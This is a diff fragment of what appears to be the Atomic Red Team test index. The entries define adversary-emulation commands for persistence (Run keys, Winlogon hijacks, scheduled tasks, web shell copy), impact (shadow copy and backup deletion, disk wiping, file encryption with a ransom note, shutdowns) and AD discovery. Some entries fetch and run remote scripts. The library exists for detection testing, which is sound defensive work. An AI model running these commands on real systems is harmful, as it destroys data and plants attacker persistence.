2>&1 -' + ' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; -' + ' cleanup_command: 'unset ssh_authorized_keys -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed -' + ' prereq_command: 'Get-TransportAgent -TransportService FrontEnd -' + ' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -' + ' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) -' + ' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} -' + ' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 @@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) -' + ' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force @@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes -' + ' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: -' + ' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located -' + ' prereq_command: 'which_gpg=`which gpg` -' + ' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} -' + ' cleanup_command: 'rm #{encrypted_file_path} -' + ' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located -' + ' prereq_command: 'which_7z=`which 7z` -' + ' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. -' + ' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file -' + ' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` @@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi -' + ' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located -' + ' prereq_command: 'which_openssl=`which openssl` -' + ' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt -' + ' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 -' + ' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. -' + ' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'vssadmin.exe create shadow /for=c: -' + ' executor: command: 'vssadmin.exe delete shadows /all /quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} -' + ' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. -' + ' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 -' + ' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task -' + ' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable -' + ' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. -' + ' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null -' + ' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} -' + ' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe @@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} -' + ' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} -' + ' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. -' + ' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} -' + ' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. -' + ' supported_platforms: - macos - linux @@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} -' + ' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. -' + ' supported_platforms: - macos - linux executor: command: 'reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt -p -' + ' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt --reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff -' + ' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff --reboot -' + ' name: bash elevation_required: true T1565.002: @@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) -' + ' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 -' + ' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force -' + ' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks -' + ' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite -' + ' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites -' + ' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} -' + ' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 @@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) -' + ' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} -' + ' executor: command: 'Invoke-Expression #{adrecon_path} -' + ' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt @@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account -' + ' supported_platforms: - windows executor: command: 'net user administrator /domain -' + ' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed -' + ' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} -' + ' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name -' + ' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 @@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. -' + ' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. -' + ' - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} -' + ' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | @@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = 